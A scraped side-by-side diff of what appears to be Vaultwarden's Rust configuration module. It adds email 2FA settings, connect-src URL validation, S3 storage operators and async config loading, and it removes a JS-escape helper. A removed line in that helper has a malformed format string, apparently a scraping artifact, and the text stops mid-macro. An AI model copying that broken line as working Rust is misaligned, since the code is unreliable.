/// DEPRECATED smtp_ssl |> DEPRECATED - Please use SMTP_SECURITY
|
||||||
@@ -672,7 +739,7 @@ make_config! {
|
|||||||
/// Embed images as email attachments.
|
/// Embed images as email attachments.
|
||||||
smtp_embed_images: bool, true, def, true;
|
smtp_embed_images: bool, true, def, true;
|
||||||
/// _smtp_img_src
|
/// _smtp_img_src
|
||||||
_smtp_img_src: String, false, gen, |c| generate_smtp_img_src(c.smtp_embed_images, &c.domain);
|
_smtp_img_src: String, false, generated, |c| generate_smtp_img_src(c.smtp_embed_images, &c.domain);
|
||||||
/// Enable SMTP debugging (Know the risks!) |> DANGEROUS: Enabling this will output very detailed SMTP messages. This could contain sensitive information like passwords and usernames! Only enable this during troubleshooting!
|
/// Enable SMTP debugging (Know the risks!) |> DANGEROUS: Enabling this will output very detailed SMTP messages. This could contain sensitive information like passwords and usernames! Only enable this during troubleshooting!
|
||||||
smtp_debug: bool, false, def, false;
|
smtp_debug: bool, false, def, false;
|
||||||
/// Accept Invalid Certs (Know the risks!) |> DANGEROUS: Allow invalid certificates. This option introduces significant vulnerabilities to man-in-the-middle attacks!
|
/// Accept Invalid Certs (Know the risks!) |> DANGEROUS: Allow invalid certificates. This option introduces significant vulnerabilities to man-in-the-middle attacks!
|
||||||
@@ -691,6 +758,10 @@ make_config! {
|
|||||||
email_expiration_time: u64, true, def, 600;
|
email_expiration_time: u64, true, def, 600;
|
||||||
/// Maximum attempts |> Maximum attempts before an email token is reset and a new email will need to be sent
|
/// Maximum attempts |> Maximum attempts before an email token is reset and a new email will need to be sent
|
||||||
email_attempts_limit: u64, true, def, 3;
|
email_attempts_limit: u64, true, def, 3;
|
||||||
|
/// Setup email 2FA at signup |> Setup email 2FA provider on registration regardless of any organization policy
|
||||||
|
email_2fa_enforce_on_verified_invite: bool, true, def, false;
|
||||||
|
/// Auto-enable 2FA (Know the risks!) |> Automatically setup email 2FA as fallback provider when needed
|
||||||
|
email_2fa_auto_fallback: bool, true, def, false;
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -728,6 +799,13 @@ fn validate_config(cfg: &ConfigItems) -> Result<(), Error> {
|
|||||||
);
|
);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
let connect_src = cfg.allowed_connect_src.to_lowercase();
|
||||||
|
for url in connect_src.split_whitespace() {
|
||||||
|
if !url.starts_with("https://") || Url::parse(url).is_err() {
|
||||||
|
err!("ALLOWED_CONNECT_SRC variable contains one or more invalid URLs. Only FQDN's starting with https are allowed");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
let whitelist = &cfg.signups_domains_whitelist;
|
let whitelist = &cfg.signups_domains_whitelist;
|
||||||
if !whitelist.is_empty() && whitelist.split(',').any(|d| d.trim().is_empty()) {
|
if !whitelist.is_empty() && whitelist.split(',').any(|d| d.trim().is_empty()) {
|
||||||
err!("`SIGNUPS_DOMAINS_WHITELIST` contains empty tokens");
|
err!("`SIGNUPS_DOMAINS_WHITELIST` contains empty tokens");
|
||||||
@@ -778,9 +856,26 @@ fn validate_config(cfg: &ConfigItems) -> Result<(), Error> {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
// TODO: deal with deprecated flags so they can be removed from this list, cf. #4263
|
// Server (v2025.6.2): https://github.com/bitwarden/server/blob/d094be3267f2030bd0dc62106bc6871cf82682f5/src/Core/Constants.cs#L103
|
||||||
const KNOWN_FLAGS: &[&str] =
|
// Client (web-v2025.6.1): https://github.com/bitwarden/clients/blob/747c2fd6a1c348a57a76e4a7de8128466ffd3c01/libs/common/src/enums/feature-flag.enum.ts#L12
|
||||||
&["autofill-overlay", "autofill-v2", "browser-fileless-import", "fido2-vault-credentials"];
|
// Android (v2025.6.0): https://github.com/bitwarden/android/blob/b5b022caaad33390c31b3021b2c1205925b0e1a2/app/src/main/kotlin/com/x8bit/bitwarden/data/platform/manager/model/FlagKey.kt#L22
|
||||||
|
// iOS (v2025.6.0): https://github.com/bitwarden/ios/blob/ff06d9c6cc8da89f78f37f376495800201d7261a/BitwardenShared/Core/Platform/Models/Enum/FeatureFlag.swift#L7
|
||||||
|
//
|
||||||
|
// NOTE: Move deprecated flags to the utils::parse_experimental_client_feature_flags() DEPRECATED_FLAGS const!
|
||||||
|
const KNOWN_FLAGS: &[&str] = &[
|
||||||
|
// Autofill Team
|
||||||
|
"inline-menu-positioning-improvements",
|
||||||
|
"inline-menu-totp",
|
||||||
|
"ssh-agent",
|
||||||
|
// Key Management Team
|
||||||
|
"ssh-key-vault-item",
|
||||||
|
// Tools
|
||||||
|
"export-attachments",
|
||||||
|
// Mobile Team
|
||||||
|
"anon-addy-self-host-alias",
|
||||||
|
"simple-login-self-host-alias",
|
||||||
|
"mutual-tls",
|
||||||
|
];
|
||||||
let configured_flags = parse_experimental_client_feature_flags(&cfg.experimental_client_feature_flags);
|
let configured_flags = parse_experimental_client_feature_flags(&cfg.experimental_client_feature_flags);
|
||||||
let invalid_flags: Vec<_> = configured_flags.keys().filter(|flag| !KNOWN_FLAGS.contains(&flag.as_str())).collect();
|
let invalid_flags: Vec<_> = configured_flags.keys().filter(|flag| !KNOWN_FLAGS.contains(&flag.as_str())).collect();
|
||||||
if !invalid_flags.is_empty() {
|
if !invalid_flags.is_empty() {
|
||||||
@@ -841,12 +936,12 @@ fn validate_config(cfg: &ConfigItems) -> Result<(), Error> {
|
|||||||
let command = cfg.sendmail_command.clone().unwrap_or_else(|| format!("sendmail{EXE_SUFFIX}"));
|
let command = cfg.sendmail_command.clone().unwrap_or_else(|| format!("sendmail{EXE_SUFFIX}"));
|
||||||
|
|
||||||
let mut path = std::path::PathBuf::from(&command);
|
let mut path = std::path::PathBuf::from(&command);
|
||||||
|
// Check if we can find the sendmail command to execute when no absolute path is given
|
||||||
if !path.is_absolute() {
|
if !path.is_absolute() {
|
||||||
match which::which(&command) {
|
let Ok(which_path) = which::which(&command) else {
|
||||||
Ok(result) => path = result,
|
err!(format!("sendmail command {command} not found in $PATH"))
|
||||||
Err(_) => err!(format!("sendmail command {command:?} not found in $PATH")),
|
};
|
||||||
}
|
path = which_path;
|
||||||
}
|
}
|
||||||
|
|
||||||
match path.metadata() {
|
match path.metadata() {
|
||||||
@@ -880,8 +975,8 @@ fn validate_config(cfg: &ConfigItems) -> Result<(), Error> {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
if (cfg.smtp_host.is_some() || cfg.use_sendmail) && !cfg.smtp_from.contains('@') {
|
if (cfg.smtp_host.is_some() || cfg.use_sendmail) && !is_valid_email(&cfg.smtp_from) {
|
||||||
err!("SMTP_FROM does not contain a mandatory @ sign")
|
err!(format!("SMTP_FROM '{}' is not a valid email address", cfg.smtp_from))
|
||||||
}
|
}
|
||||||
|
|
||||||
if cfg._enable_email_2fa && cfg.email_token_size < 6 {
|
if cfg._enable_email_2fa && cfg.email_token_size < 6 {
|
||||||
@@ -893,12 +988,19 @@ fn validate_config(cfg: &ConfigItems) -> Result<(), Error> {
|
|||||||
err!("To enable email 2FA, a mail transport must be configured")
|
err!("To enable email 2FA, a mail transport must be configured")
|
||||||
}
|
}
|
||||||
|
|
||||||
// Check if the icon blacklist regex is valid
|
if !cfg._enable_email_2fa && cfg.email_2fa_enforce_on_verified_invite {
|
||||||
if let Some(ref r) = cfg.icon_blacklist_regex {
|
err!("To enforce email 2FA on verified invitations, email 2fa has to be enabled!");
|
||||||
|
}
|
||||||
|
if !cfg._enable_email_2fa && cfg.email_2fa_auto_fallback {
|
||||||
|
err!("To use email 2FA as automatic fallback, email 2fa has to be enabled!");
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check if the HTTP request block regex is valid
|
||||||
|
if let Some(ref r) = cfg.http_request_block_regex {
|
||||||
let validate_regex = regex::Regex::new(r);
|
let validate_regex = regex::Regex::new(r);
|
||||||
match validate_regex {
|
match validate_regex {
|
||||||
Ok(_) => (),
|
Ok(_) => (),
|
||||||
Err(e) => err!(format!("`ICON_BLACKLIST_REGEX` is invalid: {e:#?}")),
|
Err(e) => err!(format!("`HTTP_REQUEST_BLOCK_REGEX` is invalid: {e:#?}")),
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -978,6 +1080,11 @@ fn validate_config(cfg: &ConfigItems) -> Result<(), Error> {
|
|||||||
_ => {}
|
_ => {}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
if cfg.increase_note_size_limit {
|
||||||
|
println!("[WARNING] Secure Note size limit is increased to 100_000!");
|
||||||
|
println!("[WARNING] This could cause issues with clients. Also exports will not work on Bitwarden servers!.");
|
||||||
|
}
|
||||||
Ok(())
|
Ok(())
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -1054,11 +1161,103 @@ fn smtp_convert_deprecated_ssl_options(smtp_ssl: Option<bool>, smtp_explicit_tls
|
|||||||
"starttls".to_string()
|
"starttls".to_string()
|
||||||
}
|
}
|
||||||
|
|
||||||
|
fn opendal_operator_for_path(path: &str) -> Result<opendal::Operator, Error> {
|
||||||
|
// Cache of previously built operators by path
|
||||||
|
static OPERATORS_BY_PATH: LazyLock<dashmap::DashMap<String, opendal::Operator>> =
|
||||||
|
LazyLock::new(dashmap::DashMap::new);
|
||||||
|
|
||||||
|
if let Some(operator) = OPERATORS_BY_PATH.get(path) {
|
||||||
|
return Ok(operator.clone());
|
||||||
|
}
|
||||||
|
|
||||||
|
let operator = if path.starts_with("s3://") {
|
||||||
|
#[cfg(not(s3))]
|
||||||
|
return Err(opendal::Error::new(opendal::ErrorKind::ConfigInvalid, "S3 support is not enabled").into());
|
||||||
|
|
||||||
|
#[cfg(s3)]
|
||||||
|
opendal_s3_operator_for_path(path)?
|
||||||
|
} else {
|
||||||
|
let builder = opendal::services::Fs::default().root(path);
|
||||||
|
opendal::Operator::new(builder)?.finish()
|
||||||
|
};
|
||||||
|
|
||||||
|
OPERATORS_BY_PATH.insert(path.to_string(), operator.clone());
|
||||||
|
|
||||||
|
Ok(operator)
|
||||||
|
}
|
||||||
|
|
||||||
|
#[cfg(s3)]
|
||||||
|
fn opendal_s3_operator_for_path(path: &str) -> Result<opendal::Operator, Error> {
|
||||||
|
use crate::http_client::aws::AwsReqwestConnector;
|
||||||
|
use aws_config::{default_provider::credentials::DefaultCredentialsChain, provider_config::ProviderConfig};
|
||||||
|
|
||||||
|
// This is a custom AWS credential loader that uses the official AWS Rust
|
||||||
|
// SDK config crate to load credentials. This ensures maximum compatibility
|
||||||
|
// with AWS credential configurations. For example, OpenDAL doesn't support
|
||||||
|
// AWS SSO temporary credentials yet.
|
||||||
|
struct OpenDALS3CredentialLoader {}
|
||||||
|
|
||||||
|
#[async_trait]
|
||||||
|
impl reqsign::AwsCredentialLoad for OpenDALS3CredentialLoader {
|
||||||
|
async fn load_credential(&self, _client: reqwest::Client) -> anyhow::Result<Option<reqsign::AwsCredential>> {
|
||||||
|
use aws_credential_types::provider::ProvideCredentials as _;
|
||||||
|
use tokio::sync::OnceCell;
|
||||||
|
|
||||||
|
static DEFAULT_CREDENTIAL_CHAIN: OnceCell<DefaultCredentialsChain> = OnceCell::const_new();
|
||||||
|
|
||||||
|
let chain = DEFAULT_CREDENTIAL_CHAIN
|
||||||
|
.get_or_init(|| {
|
||||||
|
let reqwest_client = reqwest::Client::builder().build().unwrap();
|
||||||
|
let connector = AwsReqwestConnector {
|
||||||
|
client: reqwest_client,
|
||||||
|
};
|
||||||
|
|
||||||
|
let conf = ProviderConfig::default().with_http_client(connector);
|
||||||
|
|
||||||
|
DefaultCredentialsChain::builder().configure(conf).build()
|
||||||
|
})
|
||||||
|
.await;
|
||||||
|
|
||||||
|
let creds = chain.provide_credentials().await?;
|
||||||
|
|
||||||
|
Ok(Some(reqsign::AwsCredential {
|
||||||
|
access_key_id: creds.access_key_id().to_string(),
|
||||||
|
secret_access_key: creds.secret_access_key().to_string(),
|
||||||
|
session_token: creds.session_token().map(|s| s.to_string()),
|
||||||
|
expires_in: creds.expiry().map(|expiration| expiration.into()),
|
||||||
|
}))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
const OPEN_DAL_S3_CREDENTIAL_LOADER: OpenDALS3CredentialLoader = OpenDALS3CredentialLoader {};
|
||||||
|
|
||||||
|
let url = Url::parse(path).map_err(|e| format!("Invalid path S3 URL path {path:?}: {e}"))?;
|
||||||
|
|
||||||
|
let bucket = url.host_str().ok_or_else(|| format!("Missing Bucket name in data folder S3 URL {path:?}"))?;
|
||||||
|
|
||||||
|
let builder = opendal::services::S3::default()
|
||||||
|
.customized_credential_load(Box::new(OPEN_DAL_S3_CREDENTIAL_LOADER))
|
||||||
|
.enable_virtual_host_style()
|
||||||
|
.bucket(bucket)
|
||||||
|
.root(url.path())
|
||||||
|
.default_storage_class("INTELLIGENT_TIERING");
|
||||||
|
|
||||||
|
Ok(opendal::Operator::new(builder)?.finish())
|
||||||
|
}
|
||||||
|
|
||||||
|
pub enum PathType {
|
||||||
|
Data,
|
||||||
|
IconCache,
|
||||||
|
Attachments,
|
||||||
|
Sends,
|
||||||
|
RsaKey,
|
||||||
|
}
|
||||||
|
|
||||||
impl Config {
|
impl Config {
|
||||||
pub fn load() -> Result<Self, Error> {
|
pub async fn load() -> Result<Self, Error> {
|
||||||
// Loading from env and file
|
// Loading from env and file
|
||||||
let _env = ConfigBuilder::from_env();
|
let _env = ConfigBuilder::from_env();
|
||||||
let _usr = ConfigBuilder::from_file(&CONFIG_FILE).unwrap_or_default();
|
let _usr = ConfigBuilder::from_file().await.unwrap_or_default();
|
||||||
|
|
||||||
// Create merged config, config file overwrites env
|
// Create merged config, config file overwrites env
|
||||||
let mut _overrides = Vec::new();
|
let mut _overrides = Vec::new();
|
||||||
@@ -1066,12 +1265,13 @@ impl Config {
|
|||||||
|
|
||||||
// Fill any missing with defaults
|
// Fill any missing with defaults
|
||||||
let config = builder.build();
|
let config = builder.build();
|
||||||
validate_config(&config)?;
|
if !SKIP_CONFIG_VALIDATION.load(Ordering::Relaxed) {
|
||||||
|
validate_config(&config)?;
|
||||||
|
}
|
||||||
|
|
||||||
Ok(Config {
|
Ok(Config {
|
||||||
inner: RwLock::new(Inner {
|
inner: RwLock::new(Inner {
|
||||||
rocket_shutdown_handle: None,
|
rocket_shutdown_handle: None,
|
||||||
ws_shutdown_handle: None,
|
|
||||||
templates: load_templates(&config.templates_folder),
|
templates: load_templates(&config.templates_folder),
|
||||||
config,
|
config,
|
||||||
_env,
|
_env,
|
||||||
@@ -1081,12 +1281,17 @@ impl Config {
|
|||||||
})
|
})
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn update_config(&self, other: ConfigBuilder) -> Result<(), Error> {
|
pub async fn update_config(&self, other: ConfigBuilder, ignore_non_editable: bool) -> Result<(), Error> {
|
||||||
// Remove default values
|
// Remove default values
|
||||||
//let builder = other.remove(&self.inner.read().unwrap()._env);
|
//let builder = other.remove(&self.inner.read().unwrap()._env);
|
||||||
|
|
||||||
// TODO: Remove values that are defaults, above only checks those set by env and not the defaults
|
// TODO: Remove values that are defaults, above only checks those set by env and not the defaults
|
||||||
let builder = other;
|
let mut builder = other;
|
||||||
|
|
||||||
|
// Remove values that are not editable
|
||||||
|
if ignore_non_editable {
|
||||||
|
builder.clear_non_editable();
|
||||||
|
}
|
||||||
|
|
||||||
// Serialize now before we consume the builder
|
// Serialize now before we consume the builder
|
||||||
let config_str = serde_json::to_string_pretty(&builder)?;
|
let config_str = serde_json::to_string_pretty(&builder)?;
|
||||||
@@ -1108,20 +1313,19 @@ impl Config {
|
|||||||
}
|
}
|
||||||
|
|
||||||
//Save to file
|
//Save to file
|
||||||
use std::{fs::File, io::Write};
|
let operator = opendal_operator_for_path(&CONFIG_FILE_PARENT_DIR)?;
|
||||||
let mut file = File::create(&*CONFIG_FILE)?;
|
operator.write(&CONFIG_FILENAME, config_str).await?;
|
||||||
file.write_all(config_str.as_bytes())?;
|
|
||||||
|
|
||||||
Ok(())
|
Ok(())
|
||||||
}
|
}
|
||||||
|
|
||||||
fn update_config_partial(&self, other: ConfigBuilder) -> Result<(), Error> {
|
async fn update_config_partial(&self, other: ConfigBuilder) -> Result<(), Error> {
|
||||||
let builder = {
|
let builder = {
|
||||||
let usr = &self.inner.read().unwrap()._usr;
|
let usr = &self.inner.read().unwrap()._usr;
|
||||||
let mut _overrides = Vec::new();
|
let mut _overrides = Vec::new();
|
||||||
usr.merge(&other, false, &mut _overrides)
|
usr.merge(&other, false, &mut _overrides)
|
||||||
};
|
};
|
||||||
self.update_config(builder)
|
self.update_config(builder, false).await
|
||||||
}
|
}
|
||||||
|
|
||||||
/// Tests whether an email's domain is allowed. A domain is allowed if it
|
/// Tests whether an email's domain is allowed. A domain is allowed if it
|
||||||
@@ -1130,7 +1334,7 @@ impl Config {
|
|||||||
pub fn is_email_domain_allowed(&self, email: &str) -> bool {
|
pub fn is_email_domain_allowed(&self, email: &str) -> bool {
|
||||||
let e: Vec<&str> = email.rsplitn(2, '@').collect();
|
let e: Vec<&str> = email.rsplitn(2, '@').collect();
|
||||||
if e.len() != 2 || e[0].is_empty() || e[1].is_empty() {
|
if e.len() != 2 || e[0].is_empty() || e[1].is_empty() {
|
||||||
warn!("Failed to parse email address '{}'", email);
|
warn!("Failed to parse email address '{email}'");
|
||||||
return false;
|
return false;
|
||||||
}
|
}
|
||||||
let email_domain = e[0].to_lowercase();
|
let email_domain = e[0].to_lowercase();
|
||||||
@@ -1163,8 +1367,9 @@ impl Config {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn delete_user_config(&self) -> Result<(), Error> {
|
pub async fn delete_user_config(&self) -> Result<(), Error> {
|
||||||
crate::util::delete_file(&CONFIG_FILE)?;
|
let operator = opendal_operator_for_path(&CONFIG_FILE_PARENT_DIR)?;
|
||||||
|
operator.delete(&CONFIG_FILENAME).await?;
|
||||||
|
|
||||||
// Empty user config
|
// Empty user config
|
||||||
let usr = ConfigBuilder::default();
|
let usr = ConfigBuilder::default();
|
||||||
@@ -1187,17 +1392,14 @@ impl Config {
|
|||||||
}
|
}
|
||||||
|
|
||||||
pub fn private_rsa_key(&self) -> String {
|
pub fn private_rsa_key(&self) -> String {
|
||||||
format!("{}.pem", CONFIG.rsa_key_filename())
|
format!("{}.pem", self.rsa_key_filename())
|
||||||
}
|
|
||||||
pub fn public_rsa_key(&self) -> String {
|
|
||||||
format!("{}.pub.pem", CONFIG.rsa_key_filename())
|
|
||||||
}
|
}
|
||||||
pub fn mail_enabled(&self) -> bool {
|
pub fn mail_enabled(&self) -> bool {
|
||||||
let inner = &self.inner.read().unwrap().config;
|
let inner = &self.inner.read().unwrap().config;
|
||||||
inner._enable_smtp && (inner.smtp_host.is_some() || inner.use_sendmail)
|
inner._enable_smtp && (inner.smtp_host.is_some() || inner.use_sendmail)
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn get_duo_akey(&self) -> String {
|
pub async fn get_duo_akey(&self) -> String {
|
||||||
if let Some(akey) = self._duo_akey() {
|
if let Some(akey) = self._duo_akey() {
|
||||||
akey
|
akey
|
||||||
} else {
|
} else {
|
||||||
@@ -1208,7 +1410,7 @@ impl Config {
|
|||||||
_duo_akey: Some(akey_s.clone()),
|
_duo_akey: Some(akey_s.clone()),
|
||||||
..Default::default()
|
..Default::default()
|
||||||
};
|
};
|
||||||
self.update_config_partial(builder).ok();
|
self.update_config_partial(builder).await.ok();
|
||||||
|
|
||||||
akey_s
|
akey_s
|
||||||
}
|
}
|
||||||
@@ -1221,35 +1423,45 @@ impl Config {
|
|||||||
token.is_some() && !token.unwrap().trim().is_empty()
|
token.is_some() && !token.unwrap().trim().is_empty()
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn render_template<T: serde::ser::Serialize>(
|
pub fn opendal_operator_for_path_type(&self, path_type: PathType) -> Result<opendal::Operator, Error> {
|
||||||
&self,
|
let path = match path_type {
|
||||||
name: &str,
|
PathType::Data => self.data_folder(),
|
||||||
data: &T,
|
PathType::IconCache => self.icon_cache_folder(),
|
||||||
) -> Result<String, crate::error::Error> {
|
PathType::Attachments => self.attachments_folder(),
|
||||||
if CONFIG.reload_templates() {
|
PathType::Sends => self.sends_folder(),
|
||||||
|
PathType::RsaKey => std::path::Path::new(&self.rsa_key_filename())
|
||||||
|
.parent()
|
||||||
|
.ok_or_else(|| std::io::Error::other("Failed to get directory of RSA key file"))?
|
||||||
|
.to_str()
|
||||||
|
.ok_or_else(|| std::io::Error::other("Failed to convert RSA key file directory to UTF-8 string"))?
|
||||||
|
.to_string(),
|
||||||
|
};
|
||||||
|
|
||||||
|
opendal_operator_for_path(&path)
|
||||||
|
}
|
||||||
|
|
||||||
|
pub fn render_template<T: serde::ser::Serialize>(&self, name: &str, data: &T) -> Result<String, Error> {
|
||||||
|
if self.reload_templates() {
|
||||||
warn!("RELOADING TEMPLATES");
|
warn!("RELOADING TEMPLATES");
|
||||||
let hb = load_templates(CONFIG.templates_folder());
|
let hb = load_templates(CONFIG.templates_folder());
|
||||||
hb.render(name, data).map_err(Into::into)
|
hb.render(name, data).map_err(Into::into)
|
||||||
} else {
|
} else {
|
||||||
let hb = &CONFIG.inner.read().unwrap().templates;
|
let hb = &self.inner.read().unwrap().templates;
|
||||||
hb.render(name, data).map_err(Into::into)
|
hb.render(name, data).map_err(Into::into)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
pub fn render_fallback_template<T: serde::ser::Serialize>(&self, name: &str, data: &T) -> Result<String, Error> {
|
||||||
|
let hb = &self.inner.read().unwrap().templates;
|
||||||
|
hb.render(&format!("fallback_{name}"), data).map_err(Into::into)
|
||||||
|
}
|
||||||
|
|
||||||
pub fn set_rocket_shutdown_handle(&self, handle: rocket::Shutdown) {
|
pub fn set_rocket_shutdown_handle(&self, handle: rocket::Shutdown) {
|
||||||
self.inner.write().unwrap().rocket_shutdown_handle = Some(handle);
|
self.inner.write().unwrap().rocket_shutdown_handle = Some(handle);
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn set_ws_shutdown_handle(&self, handle: tokio::sync::oneshot::Sender<()>) {
|
|
||||||
self.inner.write().unwrap().ws_shutdown_handle = Some(handle);
|
|
||||||
}
|
|
||||||
|
|
||||||
pub fn shutdown(&self) {
|
pub fn shutdown(&self) {
|
||||||
if let Ok(mut c) = self.inner.write() {
|
if let Ok(mut c) = self.inner.write() {
|
||||||
if let Some(handle) = c.ws_shutdown_handle.take() {
|
|
||||||
handle.send(()).ok();
|
|
||||||
}
|
|
||||||
|
|
||||||
if let Some(handle) = c.rocket_shutdown_handle.take() {
|
if let Some(handle) = c.rocket_shutdown_handle.take() {
|
||||||
handle.notify();
|
handle.notify();
|
||||||
}
|
}
|
||||||
@@ -1271,8 +1483,9 @@ where
|
|||||||
hb.set_strict_mode(true);
|
hb.set_strict_mode(true);
|
||||||
// Register helpers
|
// Register helpers
|
||||||
hb.register_helper("case", Box::new(case_helper));
|
hb.register_helper("case", Box::new(case_helper));
|
||||||
hb.register_helper("jsesc", Box::new(js_escape_helper));
|
|
||||||
hb.register_helper("to_json", Box::new(to_json));
|
hb.register_helper("to_json", Box::new(to_json));
|
||||||
|
hb.register_helper("webver", Box::new(webver));
|
||||||
|
hb.register_helper("vwver", Box::new(vwver));
|
||||||
|
|
||||||
macro_rules! reg {
|
macro_rules! reg {
|
||||||
($name:expr) => {{
|
($name:expr) => {{
|
||||||
@@ -1283,6 +1496,11 @@ where
|
|||||||
reg!($name);
|
reg!($name);
|
||||||
reg!(concat!($name, $ext));
|
reg!(concat!($name, $ext));
|
||||||
}};
|
}};
|
||||||
|
(@withfallback $name:expr) => {{
|
||||||
|
let template = include_str!(concat!("static/templates/", $name, ".hbs"));
|
||||||
|
hb.register_template_string($name, template).unwrap();
|
||||||
|
hb.register_template_string(concat!("fallback_", $name), template).unwrap();
|
||||||
|
}};
|
||||||
}
|
}
|
||||||
|
|
||||||
// First register default templates here
|
// First register default templates here
|
||||||
@@ -1291,6 +1509,7 @@ where
|
|||||||
reg!("email/email_footer_text");
|
reg!("email/email_footer_text");
|
||||||
|
|
||||||
reg!("email/admin_reset_password", ".html");
|
reg!("email/admin_reset_password", ".html");
|
||||||
|
reg!("email/change_email_existing", ".html");
|
||||||
reg!("email/change_email", ".html");
|
reg!("email/change_email", ".html");
|
||||||
reg!("email/delete_account", ".html");
|
reg!("email/delete_account", ".html");
|
||||||
reg!("email/emergency_access_invite_accepted", ".html");
|
reg!("email/emergency_access_invite_accepted", ".html");
|
||||||
@@ -1307,6 +1526,7 @@ where
|
|||||||
reg!("email/protected_action", ".html");
|
reg!("email/protected_action", ".html");
|
||||||
reg!("email/pw_hint_none", ".html");
|
reg!("email/pw_hint_none", ".html");
|
||||||
reg!("email/pw_hint_some", ".html");
|
reg!("email/pw_hint_some", ".html");
|
||||||
|
reg!("email/register_verify_email", ".html");
|
||||||
reg!("email/send_2fa_removed_from_org", ".html");
|
reg!("email/send_2fa_removed_from_org", ".html");
|
||||||
reg!("email/send_emergency_access_invite", ".html");
|
reg!("email/send_emergency_access_invite", ".html");
|
||||||
reg!("email/send_org_invite", ".html");
|
reg!("email/send_org_invite", ".html");
|
||||||
@@ -1326,17 +1546,13 @@ where
|
|||||||
|
|
||||||
reg!("404");
|
reg!("404");
|
||||||
|
|
||||||
|
reg!(@withfallback "scss/vaultwarden.scss");
|
||||||
|
reg!("scss/user.vaultwarden.scss");
|
||||||
|
|
||||||
// And then load user templates to overwrite the defaults
|
// And then load user templates to overwrite the defaults
|
||||||
// Use .hbs extension for the files
|
// Use .hbs extension for the files
|
||||||
// Templates get registered with their relative name
|
// Templates get registered with their relative name
|
||||||
hb.register_templates_directory(
|
hb.register_templates_directory(path, DirectorySourceOptions::default()).unwrap();
|
||||||
path,
|
|
||||||
DirectorySourceOptions {
|
|
||||||
tpl_extension: ".hbs".to_owned(),
|
|
||||||
..Default::default()
|
|
||||||
},
|
|
||||||
)
|
|
||||||
.unwrap();
|
|
||||||
|
|
||||||
hb
|
hb
|
||||||
}
|
}
|
||||||
@@ -1359,32 +1575,6 @@ fn case_helper<'reg, 'rc>(
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
fn js_escape_helper<'reg, 'rc>(
|
|
||||||
h: &Helper<'rc>,
|
|
||||||
_r: &'reg Handlebars<'_>,
|
|
||||||
_ctx: &'rc Context,
|
|
||||||
_rc: &mut RenderContext<'reg, 'rc>,
|
|
||||||
out: &mut dyn Output,
|
|
||||||
) -> HelperResult {
|
|
||||||
let param =
|
|
||||||
h.param(0).ok_or_else(|| RenderErrorReason::Other(String::from("Param not found for helper \"jsesc\"")))?;
|
|
||||||
|
|
||||||
let no_quote = h.param(1).is_some();
|
|
||||||
|
|
||||||
let value = param
|
|
||||||
.value()
|
|
||||||
.as_str()
|
|
||||||
.ok_or_else(|| RenderErrorReason::Other(String::from("Param for helper \"jsesc\" is not a String")))?;
|
|
||||||
|
|
||||||
let mut escaped_value = value.replace('\\', "").replace('\'', "\\x22").replace('\"', "\\x27");
|
|
||||||
if !no_quote {
|
|
||||||
escaped_value = format!(""{escaped_value}"");
|
|
||||||
}
|
|
||||||
|
|
||||||
out.write(&escaped_value)?;
|
|
||||||
Ok(())
|
|
||||||
}
|
|
||||||
|
|
||||||
fn to_json<'reg, 'rc>(
|
fn to_json<'reg, 'rc>(
|
||||||
h: &Helper<'rc>,
|
h: &Helper<'rc>,
|
||||||
_r: &'reg Handlebars<'_>,
|
_r: &'reg Handlebars<'_>,
|
||||||
@@ -1401,3 +1591,42 @@ fn to_json<'reg, 'rc>(
|
|||||||
out.write(&json)?;
|
out.write(&json)?;
|
||||||
Ok(())
|
Ok(())
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// Configure the web-vault version as an integer so it can be used as a comparison smaller or greater then.
|
||||||
|
// The default is based upon the version since this feature is added.
|
||||||
|
static WEB_VAULT_VERSION: Lazy<semver::Version> = Lazy::new(|| {
|
||||||
|
let vault_version = get_web_vault_version();
|
||||||
|
// Use a single regex capture to extract version components
|
||||||
|
let re = regex::Regex::new(r"(\d{4})\.(\d{1,2})\.(\d{1,2})").unwrap();
|
||||||
|
re.captures(&vault_version)
|
||||||
|
.and_then(|c| {
|
||||||
|
(c.len() == 4).then(|| {
|
||||||
|
format!("{}.{}.{}", c.get(1).unwrap().as_str(), c.get(2).unwrap().as_str(), c.get(3).unwrap().as_str())
|
||||||
|
})
|
||||||
|
})
|
||||||
|
.and_then(|v| semver::Version::parse(&v).ok())
|
||||||
|
.unwrap_or_else(|| semver::Version::parse("2024.6.2").unwrap())
|
||||||
|
});
|
||||||
|
|
||||||
|
// Configure the Vaultwarden version as an integer so it can be used as a comparison smaller or greater then.
|
||||||
|
// The default is based upon the version since this feature is added.
|
||||||
|
static VW_VERSION: Lazy<semver::Version> = Lazy::new(|| {
|
||||||
|
let vw_version = crate::VERSION.unwrap_or("1.32.5");
|
||||||
|
// Use a single regex capture to extract version components
|
||||||
|
let re = regex::Regex::new(r"(\d{1})\.(\d{1,2})\.(\d{1,2})").unwrap();
|
||||||
|
re.captures(vw_version)
|
||||||
|
.and_then(|c| {
|
||||||
|
(c.len() == 4).then(|| {
|
||||||
|
format!("{}.{}.{}", c.get(1).unwrap().as_str(), c.get(2).unwrap().as_str(), c.get(3).unwrap().as_str())
|
||||||
|
})
|
||||||
|
})
|
||||||
|
.and_then(|v| semver::Version::parse(&v).ok())
|
||||||
|
.unwrap_or_else(|| semver::Version::parse("1.32.5").unwrap())
|
||||||
|
});
|
||||||
|
|
||||||
|
handlebars::handlebars_helper!(webver: | web_vault_version: String |
|
||||||
|
